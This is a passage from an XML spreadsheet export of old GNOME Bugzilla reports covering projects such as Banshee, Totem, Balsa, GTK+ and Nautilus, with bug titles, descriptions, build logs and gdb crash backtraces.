    <t>The .pc file does not contain the libs information</t>
  </si>
  <si>
    <t>Please describe the problem:
The banshee-1.pc file does not contain the information about the libraries used to build banshee.
Steps to reproduce:
1. Run pkg-config --libs banshee-1
Actual results:
No output
Expected results:
Have an output similar to the following :
-r:/usr/lib/banshee-1/Banshee.Core.dll -r:/usr/lib/banshee-1/Hyena.dll [...]
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>bertrand.lorentz</t>
  </si>
  <si>
    <t>PYGTK-155318</t>
  </si>
  <si>
    <t>typos in tutorial</t>
  </si>
  <si>
    <t>Documentation bug
Section: 4.3. Packing Demonstration Program
Lines 52-241 define the PackBox1 class initialization method __init__() that
creates a window and a child veritcal box that is populated with a different
widget arrangement depending on the argument passed to it.
Correct version:
Lines 52-241 define the PackBox1 class initialization method __init__() that
creates a window and a child vertical box that is populated with a different
widget arrangement depending on the argument passed to it.
Other information:</t>
  </si>
  <si>
    <t>GDK-PIXBUF-473862</t>
  </si>
  <si>
    <t>Using non-threadsafe pixbuf loaders at the same time causes deadlocks</t>
  </si>
  <si>
    <t>For example when you try to use SVG pixbuf loader to load a SVG image with a TIFF image embedded/referenced: boom!
We worked around some critical problems in EOG caused by this bug (see bug #447063 and bug #449409) but this is a kind of fundamental problem in the pixbuf loading infrastructure.</t>
  </si>
  <si>
    <t>gdk-pixbuf-maint</t>
  </si>
  <si>
    <t>lucasr.at.mundo</t>
  </si>
  <si>
    <t>GNOME-UTILS-524574</t>
  </si>
  <si>
    <t>gsearchtool</t>
  </si>
  <si>
    <t>gnome-search-tool uses ~/.Trash instead of new gvfs Trash system</t>
  </si>
  <si>
    <t>Please describe the problem:
gnome-search-tool should use the new gvfs trash system rather then sending files to ~/.Trash
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>vfiend</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-80938</t>
  </si>
  <si>
    <t>no background or icons (background-properties-capplet Crash at 65.166.108.73)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Version: 1.4.0.1
Severity: 
&gt;Synopsis: no background or icons
&gt;Class: sw-bug
System: startup
&gt;Description:
I have no background or icons.
&gt;How-To-Repeat:
open gnomecc click background
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-05-06 09:11 -------
The original reporter (nick@computery.netb) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GOBJECT-INTROSPECTION-593125</t>
  </si>
  <si>
    <t>GOBJECT-INTROSPECTION</t>
  </si>
  <si>
    <t>Add INTROSPECTION_CFLAGS and LIBS in GOBJECT_INTROSPECTION_CHECK and REQUIRE</t>
  </si>
  <si>
    <t>Created attachment 141727
Add INTROSPECTION_CFLAGS and LIBS in GOBJECT_INTROSPECTION_CHECK and REQUIRE
Along other INTROSPECTION_ variables CFLAGS and LIBS could be useful too.</t>
  </si>
  <si>
    <t>gobject-introspection-maint</t>
  </si>
  <si>
    <t>svdlinden</t>
  </si>
  <si>
    <t>GNOME-PANEL-109887</t>
  </si>
  <si>
    <t>window selector</t>
  </si>
  <si>
    <t>gnome foot menu icon focus invisible when 'prelit'</t>
  </si>
  <si>
    <t>when the pointer is in the foot icon (i.e. like 'prelight') the focus
indication doesn't get shown.
IOW if the pointer is inside the foot and you focus the panel
(Ctrl-Alt-Tab) focus doesn't get shown on the foot when it's reached in
the focus chain (Tab-Tab-Tab-Tab...)
weird but true.</t>
  </si>
  <si>
    <t>GTK-DOC-652740</t>
  </si>
  <si>
    <t>GTK-DOC</t>
  </si>
  <si>
    <t>Warnings during expansion of content files</t>
  </si>
  <si>
    <t>Expansion of content files causes bogus warnings such as
   :0: warning: Can't find tag end: ]&gt; in docs for: module-tutorial-tool.xml file.
where module-tutorial-tool.xml is the name of the expanded content file.  This seems to be a regression.
Why it happens?
Function ExpandAbbreviationsEndTag() asserts that  not just &gt;.  But the square brackets that enclose internal subset declaration if present are optional.  Content files rarely need to declare internal subsets so they generally do not contain any square brackets in the doctype declaration (heck the brackets are not even present in files generated by gtk-doc itself). Requiring them makes no sense.</t>
  </si>
  <si>
    <t>gtk-doc-maint</t>
  </si>
  <si>
    <t>GSTREAMER-450879</t>
  </si>
  <si>
    <t>Missing files in po/POTFILES.in</t>
  </si>
  <si>
    <t>Please describe the problem:
While updating the Swedish translation for GStreamer I noticed that there are
several missing files in po/POTFILES.in.
Steps to reproduce:
Reproduce by running intltool-update -m under po/
The following files contain translations and are currently not in use. Please
consider adding these to the POTFILES.in file located in the po/ directory.
ext/dvdnav/dvdnavsrc.c
If some of these files are left out on purpose then please add them to
POTFILES.skip instead of POTFILES.in. A file 'missing' containing this list
of left out files has been written in the current directory.
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-85628</t>
  </si>
  <si>
    <t>[ui-review] Background Preferences string changes</t>
  </si>
  <si>
    <t>The following issues came out of the recent ui-review and are recommended
for fixing prior to GNOME 2.0.1:
- Add seperator bar above the action area
- Remove help text (You can...)- it's in documentation
- s/Picture/Select picture:
- s/Color/Color:
- s/Border the Picture with a/Picture border:	
- Picture border should be disabled if you select 'No picture'
- Default button should be 'Close'</t>
  </si>
  <si>
    <t>LIBGNOMEUI-129254</t>
  </si>
  <si>
    <t xml:space="preserve"> domain %s string appending in libgnomeui looks broken for RTL languages</t>
  </si>
  <si>
    <t>#: libgnomeui/gnome-authentication-manager.c:265
# c-format
msgid  domain %s
This string appending looks suspiciously broken for RTL languages.</t>
  </si>
  <si>
    <t>EKIGA-118989</t>
  </si>
  <si>
    <t>[usability] ctrl+c for connect breaks copy / paste</t>
  </si>
  <si>
    <t>Please don't use ctrl+c as shortcut for Connect as copy from GM and
pasting in other window doesn't work anymore.</t>
  </si>
  <si>
    <t>marius.andreiana</t>
  </si>
  <si>
    <t>TOTEM-315864</t>
  </si>
  <si>
    <t>Build failure with totem</t>
  </si>
  <si>
    <t>if gcc -DHAVE_CONFIG_H -I. -I. -I.. -D_REENTRANT -I.. -I./plparse -I./backend
-DORBIT2=1 -pthread -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
-I/opt/gnome2/include/glib-2.0 -I/opt/gnome2/lib/glib-2.0/include
-I/opt/gnome2/include/gtk-2.0 -I/opt/gnome2/lib/gtk-2.0/include
-I/opt/gnome2/include/atk-1.0 -I/opt/gnome2/include/cairo
-I/opt/gnome2/include/pango-1.0 -I/opt/gnome2/include/libgnomeui-2.0
-I/opt/gnome2/include/libgnome-2.0 -I/opt/gnome2/include/libgnomecanvas-2.0
-I/opt/gnome2/include/libart-2.0 -I/opt/gnome2/include/gconf/2
-I/opt/gnome2/include/libbonoboui-2.0 -I/opt/gnome2/include/gnome-vfs-2.0
-I/opt/gnome2/lib/gnome-vfs-2.0/include -I/opt/gnome2/include/gnome-keyring-1
-I/opt/gnome2/include/orbit-2.0 -I/opt/gnome2/include/libbonobo-2.0
-I/opt/gnome2/include/bonobo-activation-2.0 -I/opt/gnome2/include
-I/usr/include/freetype2 -I/opt/gnome2/include/libxml2
-I/opt/gnome2/include/libglade-2.0 -I/opt/gnome2/include/gnome-vfs-module-2.0
-I/opt/gnome2/include/gnome-desktop-2.0
-I/opt/gnome2/include/startup-notification-1.0
-I/opt/gnome2/include/gstreamer-0.8   -I/opt/gnome2/include/dbus-1.0
-I/opt/gnome2/lib/dbus-1.0/include -I/opt/gnome2/include/glib-2.0
-I/opt/gnome2/lib/glib-2.0/include   -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
-pthread -DORBIT2=1 -I/opt/gnome2/include/gtk-2.0
-I/opt/gnome2/lib/gtk-2.0/include -I/opt/gnome2/include/atk-1.0
-I/opt/gnome2/include/cairo -I/opt/gnome2/include/pango-1.0
-I/opt/gnome2/include/glib-2.0 -I/opt/gnome2/lib/glib-2.0/include
-I/opt/gnome2/include/gstreamer-0.8 -I/opt/gnome2/include/libxml2
-I/opt/gnome2/include/gconf/2 -I/opt/gnome2/include/orbit-2.0
-I/opt/gnome2/include/mozilla-1.7.9 -I/opt/gnome2/include/mozilla-1.7.9/xpcom
-I/opt/gnome2/include/mozilla-1.7.9/string
-I/opt/gnome2/include/mozilla-1.7.9/nspr
-I/opt/gnome2/include/mozilla-1.7.9/java
-I/opt/gnome2/include/mozilla-1.7.9/plugin -I/opt/gnome2/include/gnome-vfs-2.0
-I/opt/gnome2/lib/gnome-vfs-2.0/include
-I/opt/gnome2/include/bonobo-activation-2.0 -I/opt/gnome2/include/libbonobo-2.0
  -I/opt/gnome2/include/mozilla-1.7.9  -D_LARGEFILE_SOURCE
-D_FILE_OFFSET_BITS=64 -pthread -DORBIT2=1 -I/opt/gnome2/include/gtk-2.0
-I/opt/gnome2/lib/gtk-2.0/include -I/opt/gnome2/include/atk-1.0
-I/opt/gnome2/include/cairo -I/opt/gnome2/include/pango-1.0
-I/opt/gnome2/include/glib-2.0 -I/opt/gnome2/lib/glib-2.0/include
-I/opt/gnome2/include/gstreamer-0.8 -I/opt/gnome2/include/libxml2
-I/opt/gnome2/include/gconf/2 -I/opt/gnome2/include/orbit-2.0
-I/opt/gnome2/include/nautilus -I/opt/gnome2/include/gnome-vfs-2.0
-I/opt/gnome2/lib/gnome-vfs-2.0/include
-I/opt/gnome2/include/bonobo-activation-2.0 -I/opt/gnome2/include/libbonobo-2.0
  -DGNOMELOCALEDIR=\/opt/gnome2/share/locale\
-DGCONF_PREFIX=\/apps/totem\ -DDATADIR=\/opt/gnome2/share\
-DLIBEXECDIR=\/opt/gnome2/libexec\
-DLOGO_PATH=DATADIR\\G_DIR_SEPARATOR_S\totem\G_DIR_SEPARATOR_S\totem_logo.png\
   -Wall      -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes  
-Wnested-externs -Wpointer-arith        -Wcast-align -Wsign-compare    
-fno-strict-aliasing    -I/usr/X11R6/include -g -O2 -MT totem-scrsaver.o -MD -MP
-MF .deps/totem-scrsaver.Tpo -c -o totem-scrsaver.o totem-scrsaver.c \
then mv -f .deps/totem-scrsaver.Tpo .deps/totem-scrsaver.Po else rm -f
.deps/totem-scrsaver.Tpo exit 1 fi
In file included from totem-scrsaver.c:35:
/opt/gnome2/include/dbus-1.0/dbus/dbus.h:30:2: #error Please define
DBUS_API_SUBJECT_TO_CHANGE to acknowledge your understanding that D-BUS hasn't
reached 1.0 and is subject to protocol and API churn. See the README for a full
explanation.
I just worked around it by
  cvs -q -z3 update -Pd -D 2005-09-06</t>
  </si>
  <si>
    <t>TOTEM-138805</t>
  </si>
  <si>
    <t>Totem crashed trying to play URL</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: totem
Severity: normal
Version: GNOME2.6. 0.99.9
Gnome-Distributor: GARNOME
Synopsis: Totem crashed trying to play URL
Bugzilla-Product: totem
Bugzilla-Component: general
Bugzilla-Version: 0.99.9
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
Description of the crash:
Tried to play this URL with totem and it crashed (repeatably).
http://www.ugo.com/modules/global/asx/playlist.asp?id=11317&amp;src=http://boss.streamos.com/wmedia/ugo/ugo/misc/aprilfools/aprilfools_greedo_04.wvx&amp;chn=video&amp;subchn=video
Debugging Information:
Backtrace was generated from '/home/rodd/gnome-2.5.92/bin/totem'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1084459392 (LWP 18063)]
[New Thread 145423280 (LWP 18073)]
[New Thread 48126896 (LWP 18072)]
[New Thread 101907376 (LWP 18071)]
[New Thread 84007856 (LWP 18070)]
[New Thread 35990448 (LWP 18066)]
[New Thread 71166896 (LWP 18065)]
0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x0032495b in __lll_mutex_lock_wait () from
/lib/tls/libpthread.so.0
#2  0x0000468f in ?? ()
#3  0x00e911ec in __JCR_LIST__ () from
/home/rodd/gnome-2.5.92/lib/libxine.so.1
#4  0x09ede400 in ?? ()
#5  0x003219e6 in _L_mutex_lock_26 () from /lib/tls/libpthread.so.0
#6  0xbff52ba4 in ?? ()
#7  0xbff52ba8 in ?? ()
#8  0x00e614b3 in __get_current_position (stream=0x9ede1e0) at
xine.c:1506
#9  0x00e5e996 in xine_get_pos_length (stream=0x9ede1e0 
    pos_stream=0xbff52ba4 pos_time=0xbff52ba8 length_time=0xbff52bac)
    at xine.c:1594
#10 0x0805f589 in bacon_video_widget_tick_send (bvw=0x94e3588)
    at bacon-video-widget-xine.c:1536
#11 0x005409fb in g_timeout_dispatch (source=0x95259e8
callback=0xfffffffc 
    user_data=0x94e3588) at gmain.c:3250
#12 0x0053e384 in g_main_dispatch (context=0x930bfc8) at gmain.c:1895
#13 0x0053f349 in g_main_context_dispatch (context=0x930bfc8) at
gmain.c:2441
#14 0x0053f66e in g_main_context_iterate (context=0x930bfc8 block=1 
    dispatch=1 self=0x92e90d0) at gmain.c:2522
#15 0x0053fbd6 in g_main_loop_run (loop=0x9412d88) at gmain.c:2726
#16 0x0109a1d7 in gtk_main () at gtkmain.c:1172
#17 0x0806ae4f in main (argc=1 argv=0xbff52da4) at totem.c:3854
Thread 7 (Thread 71166896 (LWP 18065)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x003225e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00e63036 in metronom_sync_loop (this=0x9525860) at metronom.c:835
	tv = {tv_sec = 1080861979 tv_usec = 348104}
	ts = {tv_sec = 1080861984 tv_nsec = 348104000}
	scr = (scr_plugin_t **) 0x9525920
	pts = 5861768
#3  0x0031f7fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x077baaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread 35990448 (LWP 18066)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00322424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00e70a68 in fifo_remove_int (fifo=0x953dd68 blocking=1)
    at audio_out.c:339
No locals.
#3  0x00e71968 in ao_loop (this_gen=0x952e6f8) at audio_out.c:376
	hw_vpts = 3
	in_buf = (audio_buffer_t *) 0x0
	out_buf = (audio_buffer_t *) 0x953dd68
	gap = 672124259850771816
	delay = 672124259850771816
	cur_time = 0
	last_sync_time = 0
	bufs_since_sync = 2
	result = 156491112
#4  0x0031f7fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x077baaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread 84007856 (LWP 18070)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x003253d6 in __nanosleep_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00e863e8 in xine_usec_sleep (usec=0) at utils.c:139
	ts = {tv_sec = 0 tv_nsec = 9188000}
#3  0x00e6e050 in video_out_loop (this_gen=0x9a61d80) at
video_out.c:1046
	vpts = 6302296
	diff = 65603379178504188
	img = (vo_frame_t *) 0x23e4
	next_frame_vpts = 6303123
	usec_to_sleep = 9188
#4  0x0031f7fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x077baaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread 101907376 (LWP 18071)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00322424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00e66148 in fifo_buffer_get (fifo=0x9edee38) at buffer.c:233
	i = 166588004
#3  0x00e6b5db in video_decoder_loop (stream_gen=0x9ede1e0)
    at video_decoder.c:84
	buf = (buf_element_t *) 0x9ef0770
	running_ticket = (xine_ticket_t *) 0x94e4630
	running = 1
	streamtype = 0
	prof_video_decode = -1
	prof_spu_decode = -1
	buftype_unknown = 0
#4  0x0031f7fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x077baaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 48126896 (LWP 18072)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00322424 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00e66148 in fifo_buffer_get (fifo=0x9ef08f0) at buffer.c:233
	i = 166660380
#3  0x00e6ca43 in audio_decoder_loop (stream_gen=0x9ede1e0)
    at audio_decoder.c:71
	buf = (buf_element_t *) 0x9ef8a48
	first_header = (buf_element_t *) 0x0
	last_header = (buf_element_t *) 0x0
	replaying_headers = 0
	running_ticket = (xine_ticket_t *) 0x94e4630
	running = 1
	prof_audio_decode = -1
	buftype_unknown = 0
	audio_channel_user = -1
#4  0x0031f7fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x077baaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 145423280 (LWP 18073)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x00325b2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0070ce0c in libgnomeui_segv_handle (signum=8) at
gnome-ui-init.c:741
	estatus = 0
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {536900352 1694518528 1761633280 536895744 
      1962950912 1761633280 536899328 939546112 419430400
872423424 
      536883200 1644194560 1929408512 536882176 838873856
1795170304 
      2046838784 536882176 1946186496 1912628480 1862296832
33554432 
      16867584 1459623680 1845520640 1862296576 125088420
1291853824 
      1677747456 125915704 145421376 145421340}} sa_flags =
125093923 
  sa_restorer = 0x8aaf440}
	pid = 0
#3  
No symbol table info available.
#4  0x00abfbb0 in __udivdi3 ()
   from
/home/rodd/gnome-2.5.92/lib/xine/plugins/1.0.0/xineplug_dmx_asf.so
No symbol table info available.
#5  0x00abcce8 in asf_read_header (this=0x9fa8ba0) at demux_asf.c:394
	file_size = 8847
	gsize = 104
#6  0x00ab8f2b in demux_asf_send_headers_common (this=0x9fa8ba0 
    send_ctrl_start=1) at demux_asf.c:639
	i = 1
	stream_id = 11272616
	buf_type = 145422672
	max_vrate = 145422647
	max_arate = 167425016
	bitrate = 0
#7  0x00ab8680 in demux_asf_send_headers (this_gen=0x9fa8ba0)
    at demux_asf.c:1824
No locals.
#8  0x00e5fd85 in __open_internal (stream=0x9ede1e0 
    mrl=0x9f93e6c
mms://st31g1.services.att-idns.net/cw3403/wm32/ac/c9/acc98b93e868ab1b9ceb389f41072cd6-3f7ac9c9.asf?ts=1080862705&amp;ttl=300&amp;cs=3484348C9BB1909760518E6D2EB412A56B715E97)
at xine.c:987
	tmp = 0xe88b70 libxine1
	config_entry = 0x9f93f10 
	retval = 1
	stream_setup = 0x9f93f10 
#9  0x00e5de48 in xine_open (stream=0x9ede1e0 
    mrl=0x1 ) at xine.c:1021
	ret = 166584800
#10 0x0805f79e in bacon_video_widget_open (bvw=0x94e3588 
    mrl=0x9f93e6c
mms://st31g1.services.att-idns.net/cw3403/wm32/ac/c9/acc98b93e868ab1b9ceb389f41072cd6-3f7ac9c9.asf?ts=1080862705&amp;ttl=300&amp;cs=3484348C9BB1909760518E6D2EB412A56B715E97
gerror=0x0) at bacon-video-widget-xine.c:1650
	error = 1
#11 0x0805ec6f in xine_event (user_data=0x94e3588 event=0x0)
    at bacon-video-widget-xine.c:1235
	ui_data = (xine_ui_data_t *) 0x9f93e6c
	prg = (xine_progress_data_t *) 0x9f93e6c
	ref = (xine_mrl_reference_data_t *) 0x9f93e6c
	data = (signal_data *) 0x9f817d0
#12 0x00e74b6c in listener_loop (queue_gen=0x9f0e238) at events.c:201
	event = (xine_event_t *) 0x9f817d0
	running = 1
#13 0x0031f7fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#14 0x077baaba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1084459392 (LWP 18063)):
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0032495b in __lll_mutex_lock_wait () from
/lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0000468f in ?? ()
No symbol table info available.
#3  0x00e911ec in __JCR_LIST__ () from
/home/rodd/gnome-2.5.92/lib/libxine.so.1
No symbol table info available.
#4  0x09ede400 in ?? ()
No symbol table info available.
#5  0x003219e6 in _L_mutex_lock_26 () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xbff52ba4 in ?? ()
No symbol table info available.
#7  0xbff52ba8 in ?? ()
No symbol table info available.
#8  0x00e614b3 in __get_current_position (stream=0x9ede1e0) at
xine.c:1506
	len = -4614734689126719008
	share = 1.2623284957633469e-260
#9  0x00e5e996 in xine_get_pos_length (stream=0x9ede1e0 
    pos_stream=0xbff52ba4 pos_time=0xbff52ba8 length_time=0xbff52bac)
    at xine.c:1594
	pos = -4
#10 0x0805f589 in bacon_video_widget_tick_send (bvw=0x94e3588)
    at bacon-video-widget-xine.c:1536
	current_time = 125245142
	stream_length = 5837628
	current_position = 0
	current_position_f = 860.944458
	ret = 1
#11 0x005409fb in g_timeout_dispatch (source=0x95259e8
callback=0xfffffffc 
    user_data=0x94e3588) at gmain.c:3250
No locals.
#12 0x0053e384 in g_main_dispatch (context=0x930bfc8) at gmain.c:1895
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0x5409d4 
	was_in_call = 0
	user_data = 0x94e3588
	callback = 0x805f484 
	cb_funcs = (GSourceCallbackFuncs *) 0x5910fc
	cb_data = 0x95257c0
	need_destroy = 154342608
	source = (GSource *) 0x95259e8
	depth = (gint *) 0x9316068
	i = 0
#13 0x0053f349 in g_main_context_dispatch (context=0x930bfc8) at
gmain.c:2441
No locals.
#14 0x0053f66e in g_main_context_iterate (context=0x930bfc8 block=1 
    dispatch=1 self=0x92e90d0) at gmain.c:2522
	got_ownership = -4
	max_priority = 2147483647
	timeout = 114
	some_ready = 1
	nfds = 1
	allocated_nfds = 10
	fds = (GPollFD *) 0x93e3478
#15 0x0053fbd6 in g_main_loop_run (loop=0x9412d88) at gmain.c:2726
	got_ownership = 6763632
	self = (GThread *) 0x92e90d0
#16 0x0109a1d7 in gtk_main () at gtkmain.c:1172
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x807a1e5
	loop = (GMainLoop *) 0x9412d88
#17 0x0806ae4f in main (argc=1 argv=0xbff52da4) at totem.c:3854
	totem = (Totem *) 0x9331388
	filename = 0x807a1e5 tcw_volume_hscale
	gc = (GConfClient *) 0x93dfbc8
	pix = (GdkPixbuf *) 0x93dfbc8
#0  0x00667c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-04-01 18:42 -------
Unknown version 0.99.9 in product totem. Setting version to unspecified.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product totem.
   Setting to default milestone for this product '---'
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>NAUTILUS-114069</t>
  </si>
  <si>
    <t>Nautilus shoudn't save windows size if maximized</t>
  </si>
  <si>
    <t>If Nautilus' windows is maximized it shouldn't remember its size when
closing it. Currently it saves the window's size even if maximized. As a
result when you re-open it it's maximized and you have to un-maximize it
by resizing the window manually.</t>
  </si>
  <si>
    <t>julo42</t>
  </si>
  <si>
    <t>GTK+-84874</t>
  </si>
  <si>
    <t>Cannot configure with included-loaders on Tru64</t>
  </si>
  <si>
    <t>Using Gtk+-2.0.3 under Tru64 5.1a I cannot specify the
--with-included-loaders option to configure e.g:
./configure --disable-modules --without-libtiff \
  --with-included-loaders=xpmpnggifjpeg
fails with the following error message:
&lt;&lt;
checking pixbuf loaders to build... xpmpnggifjpeg
configure: error: the specified loader xpm does not exist
&gt;&gt;
configuring without --with-included-loaders works fine.
Arno for the GtkAda team</t>
  </si>
  <si>
    <t>EVOLUTION-324525</t>
  </si>
  <si>
    <t>Delete Calendar Events Should Default To [Cancel]</t>
  </si>
  <si>
    <t>Please describe the problem:
When you highlight an item in the calendar and then right-mouse and select
Delete the dialog comes up and asks if you want to delete it.
The default should always be to [Cancel].  Currently it defaults to [Delete].
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GTK+-107748</t>
  </si>
  <si>
    <t>rowrefs broken if it's row_inserted handler isn't connected first</t>
  </si>
  <si>
    <t>The RowReferences handling code connects a signal handler to ::row_inserted
to keep up with inserted rows in the model. However if this signal handler
isn't connected as the first ::row_inserted signal handler on the
TreeModel things go horribly wrong. This happens for example if the user
manages to connect a signal handler first.
Attached testcase demonstrates the problem we need a good and clean fix
for this issue. As I have no clue how to fix this cleanly I guess Jonathan
should take a look at it (:</t>
  </si>
  <si>
    <t>BLUEFISH-324517</t>
  </si>
  <si>
    <t>menu syntax highlighting is wrong</t>
  </si>
  <si>
    <t>/build/buildd/bluefish-1.0.1/./configure --build=i486-linux-gnu
--prefix=/usr --includedir=${prefix}/include --mandir=
${prefix}/share/man --infodir=${prefix}/share/info --sysconfdir=/etc
--localstatedir=/var --libexecdir=${prefix}/lib/bluefish --srcdir=.
--disable-maintainer-mode --disable-update-databases
--with-freedesktop_org-menu=/usr/share/applications
--with-freedesktop_org-mime=/usr/share/mime
when you choose 'Resaltar sintaxis' ('Highlight syntax') in 'Documento'
menu ('Document') there is a tick showing if the syntax is highlighted
or not. That works properly but if you choose the command 'Actualizar
resaltado de sintaxis' ('Refresh syntax highlighting') when the
'Highlight syntax' tick is off the code is highlighted and the tick is
still off. 
Now if you choose the 'Highlight syntax' again the highlighting
switchs between on and off properly but the tick switchs in the
opposite way.</t>
  </si>
  <si>
    <t>BALSA-124568</t>
  </si>
  <si>
    <t>BALSA</t>
  </si>
  <si>
    <t>Balsa crashes: NULL pointer passed to fprintf</t>
  </si>
  <si>
    <t>Using a source code distribution of gnome 2.4.0 I was reading email with
balsa and it crashed.  Balsa had been open for a number of days and I
had just received a new email (a spam) and had just pressed next unread
and then trash.
It looks like a null pointer being passed as a string argument to
fprintf.
Debugging Information:
Backtrace was generated from '/home/pwilkins/loc/gnome-2.4.0/bin/balsa'
sol-thread active.
Retry #1:
Retry #2:
Retry #3:
Retry #4:
[New LWP    1        ]
[New Thread 1 (LWP 1)]
[Switching to Thread 1 (LWP 1)]
0xfdb9c2c8 in _waitid () from /usr/lib/libc.so.1
#0  0xfdb9c2c8 in _waitid () from /usr/lib/libc.so.1
#1  0xfdb563b0 in _waitpid () from /usr/lib/libc.so.1
#2  0xfd9daab8 in waitpid () from /usr/lib/libthread.so.1
#3  0xfd9db7e4 in __sighndlr () from /usr/lib/libthread.so.1
#4  
#5  0xfdb33344 in strlen () from /usr/lib/libc.so.1
#6  0xfdb82f40 in _doprnt () from /usr/lib/libc.so.1
#7  0xfdb849e8 in fprintf () from /usr/lib/libc.so.1
#8  0x00049514 in balsa_information_stderr
(type=LIBBALSA_INFORMATION_WARNING
    msg=0x0) at information-dialog.c:278
#9  0x00048ff8 in balsa_information_real (parent=0x15db50
    type=LIBBALSA_INFORMATION_WARNING msg=0x0) at
information-dialog.c:93
#10 0x000490c0 in balsa_information_parented (parent=0x15db50
    type=LIBBALSA_INFORMATION_WARNING
    fmt=0x207730 The message sent by
stockprofitactnoweuosr@livghawer.net with subject \paul.wilkins Stock
Market Ride to Riches - CNRH up 150% - Double your Money Now!\ contains
8-bit characters but no header descri...)
    at information-dialog.c:126
#11 0x0007f0d4 in libbalsa_warning_idle_handler (data=0x13cde30)
    at information.c:129
#12 0xfddb0b04 in g_idle_dispatch (source=0x142fb68
    callback=0x7f0b0 
user_data=0x13cde30)
    at gmain.c:3272
#13 0xfddad7c0 in g_main_dispatch (context=0x104398) at gmain.c:1751
#14 0xfddae9e0 in g_main_context_dispatch (context=0x104398) at
gmain.c:2299
#15 0xfddaee34 in g_main_context_iterate (context=0x104398 block=1
    dispatch=1 self=0x102ce8) at gmain.c:2380
#16 0xfddaf7f4 in g_main_loop_run (loop=0x1331f8) at gmain.c:2600
#17 0xfe46f80c in gtk_main () at gtkmain.c:1093
#18 0x000546f0 in main (argc=1 argv=0xffbef14c) at main.c:433
Thread 10 (Thread 9        ):
#0  0xfd9db698 in _restorefsr () from /usr/lib/libthread.so.1
No symbol table info available.
Thread 9 (Thread 8        ):
#0  0xfd9c9778 in _swtch () from /usr/lib/libthread.so.1
No symbol table info available.
#1  0x001a3d74 in ?? ()
No symbol table info available.
#2  0xfde6e350 in g_object_base_class_finalize (class=0xd0262004)
    at gobject.c:204
   list = (GList *) 0x4000cc85
   node = (GList *) 0xd0262004
#0  0xfdb9c2c8 in _waitid () from /usr/lib/libc.so.1</t>
  </si>
  <si>
    <t>balsa-maint</t>
  </si>
  <si>
    <t>paul.wilkins</t>
  </si>
  <si>
    <t>GTK+-92387</t>
  </si>
  <si>
    <t>Widget: GtkTextView</t>
  </si>
  <si>
    <t>unfriendly drag-n-drop in textview - scrolls too fast</t>
